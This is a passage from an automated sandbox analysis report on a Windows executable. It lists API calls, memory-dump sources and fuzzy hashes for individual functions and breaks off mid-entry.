                                                  • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                  • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                  • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                  • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                  APIs
                                                    • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                  • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                  • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                  • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                  • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                  • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                  • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BG3i@
                                                  • API String ID: 0-2407888476
                                                  • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                  • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                  • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                  • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                  • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                  • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                  • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                  • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
